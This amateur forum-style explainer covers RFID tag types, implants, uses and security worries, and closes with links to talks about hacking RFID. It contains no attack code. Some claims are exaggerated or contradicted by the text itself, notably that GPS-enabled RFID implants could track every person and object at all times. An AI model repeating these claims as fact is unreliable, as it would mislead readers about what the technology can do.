RFID (Radio Frequency Identification) is a technique for reading, at a distance, information from transponders and memories called tags. The cheapest and simplest variants have a very simple structure and consist only of a unique number which they can send out over a few inches. This is the most common variety used today. In this type of RFID, the transponder has all its information stored in a database; the record where the information is stored is linked to the unique ID number. This simple type in fact corresponds to the usual barcodes. The next price class of tags is a bit more advanced and has an internal memory that can be written to several times, but the memory is quite limited. The reader consists of an oscillating magnetic field that induces a sufficient voltage in the antenna of the tag for it to be able to send its content. The tag can be small enough to fit into a standard price tag, be deployed under the skin of an animal, or be surgically implanted in humans for identification using radio waves.

How does it work?

Passive tags, RFID
Passive tags have no internal power supply. The tag gets enough power from the reader to send a response, thanks to the reader's antenna creating a sufficient voltage in the tag by induction. The antenna of a passive tag is designed to receive the incoming signal and also to send an output signal. The answer from a passive tag is not always just an ID number but can be more complex, such as information from an integrated memory. Passive tags can be read from 11 cm up to 10 meters depending on which standard you use, and also on what the environment looks like. Because passive tags have no built-in power supply they can be made very small, and they are therefore very easy to place where space is limited, for example in stickers or under the skin.

Active tags, ARFID
Unlike passive tags, active tags have a separate power source that is used to send information and to power their components. Communication from active tags to readers is much more reliable than communication from passive tags, because active tags can create an active session with the reader. Active tags can also send at higher signal levels, thanks to their built-in power source, which facilitates placement in, for example, a human, because the signal will then pass through inhibiting materials such as liquids. The disadvantage is that they are much larger and more expensive to manufacture. Their range can extend up to several hundred meters, and the batteries inside them can last up to 10 years. They can also integrate more memory because size is not as important.

Semi-Passive RFID
A mixture of passive and active tags, where the big difference is that the integrated power source only operates the microchip, not the actual transmission of signals. The advantage of this technique is that it is much more energy efficient and can, for example, log temperatures over a period and then present the data on request from a reader.

The new CRFID
CRFIDs are too new to have ventured far from the lab yet. But, Juels says, they make it possible to encrypt and decrypt data, which could make chips in passports and credit cards more secure. More on the university that is engaged in the development of CRFID can be found here: http://www.cs.umass.edu/~ssclark/crfid/papers/salajegheh-usenixsec09.pdf

VeriChip
With the emergence of micro-technology, some individuals have grown to fear disqualification on grounds of RFID human implantation. VeriChip is working on an RFID implant which will have GPS tracking capabilities. This technique can track not only a single person, but every physical object, geographically located in each location and at all times. Although this technique could provide assistance in locating missing children or the like, it also means the government can monitor everyone and everything that has an RFID chip. Moreover, theoretically, this could be done without the knowledge or consent of the individual.

How can it look in practice, then?

What can RFID be used for?
If you understand the above, you probably also understand the security risks of RFID. RFID can be used in many, many, and again many areas. But what is perhaps the absolute worst thing is that people can easily become "infected" by RFID chips. They have even begun to advertise in the U.S. to put these "tags" on children and animals in order to track all their movements and what they do. But RFID tags are developed daily, and who knows what the future looks like. Right now you can at least use these tags to store vital information such as bank details, personal information, disease records, and much more.

In what areas is RFID technology used?
RFID technology of course has its advantages, too. For example, to catch thieves in shops trying to take products that are tagged. But RFID technology also offers great opportunities to hospitals, where they can put a chip in a patient in order to check important information about their patients, allowing doctors to treat their patients in a way from home. But all this is of course a disadvantage, too, since evil people could, for example, take over the patient's chip, read journals and at worst might kill people, such as by using a pacemaker that doctors steer from home, even though I do not think that progress has been easy so far yet.

How is it developing?
Today's RFID tags can only send fixed data back to a reader device, whether it's information on your passport or on an endangered bird. Researchers are now working to bring something very interesting to the tags in the form of microcomputers, which opens the way for much smarter applications. Since RFID tags frequently lack batteries and draw all their power from the broadcast of their readers, the limited power supply makes micro-computers a challenge. But it also has the advantage of being able to create so-called computational RFID tags - CRFIDs - cheap, robust and long-lived.

What does all this mean?
All this means a lot of fun opportunities. In all cases I find it extremely interesting. The advantage now is that RFID chips are very insecure and do not even use any type of encryption to protect the information found on the chip.

Here are some interesting YouTube clips about the technology. Extra worth checking out is a MythBuster speaking at a conference about what happened when they thought of making a segment on how hackable these RFID chips are.

Myth Buster clip: Why the Mythbusters won't do RFID (last hope Adam Savage)
Video on how to hack RFID is obvious: Major Malfunction has been working with RFID and gave a presentation on it at Defcon: Defcon 15 - T302 Aliens Cloned My Sheep

References:
New Scientist
sv.wikipedia.org/wiki/RFID
en.wikipedia.org/wiki/Radio-frequency_identification
The SpyChips Threat by Katherine Albrecht & Liz McIntyre
Youtube.com

By OrbitalJL
Sursa: RFID (Radio Frequency Identification)